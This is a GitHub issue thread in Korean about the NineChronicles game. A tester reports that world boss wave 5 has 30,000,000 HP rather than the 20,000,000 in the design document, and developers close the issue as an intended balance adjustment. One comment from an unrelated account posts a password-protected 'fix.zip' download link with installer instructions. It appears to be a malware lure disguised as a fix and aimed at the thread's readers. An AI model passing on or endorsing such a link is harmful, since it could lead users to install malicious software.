### ISSUE TITLE
[월드보스] 월드보스 5 Wave의 체력이 30,000,000인 현상

### ISSUE THREAD

**Issue by QgamesGeonPyoNoh** [planetarium/NineChronicles#5727]
### APV version info

v200220

### Client version info

v220.0.1

### Device

Windows, Android, iOS

### detailed device info

Windows 10, Android 12, iOS 17

### account address info

0x3146FE0E47A1998e14cd8a33640e3648A5A90276

### What happened?

[내용]
월드보스 5 Wave의 체력이 30,000,000인 현상
- 기획서 상 월드보스 5 Wave의 체력은 20,000,000 입니다. 기획의도 확인 부탁드립니다.
- Windows / Android / iOS 환경에서 발생 확인했습니다.

![Image](https://github.com/user-attachments/assets/e25145e6-5556-4d16-bd3a-5d46fce69ed5)

### How to reproduce the issue

[재현 스텝]
1. 메인 로비 - 월드보스 클릭
2. 월드보스 입장
3. 월드보스 5 Wave 도달
4. 5 Wave 체력 확인 시 30,000,000 확인

[Should be]
월드보스 5 Wave 체력이 20.000,000이어야 합니다.

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jaeho0103** [comment]
밸런스 조절을 위해 체크중에 있습니다.

**Comment by QgamesGeonPyoNoh** [comment]
밸런스 조절 중인 사항으로 확인했습니다.
이슈 종료하겠습니다.
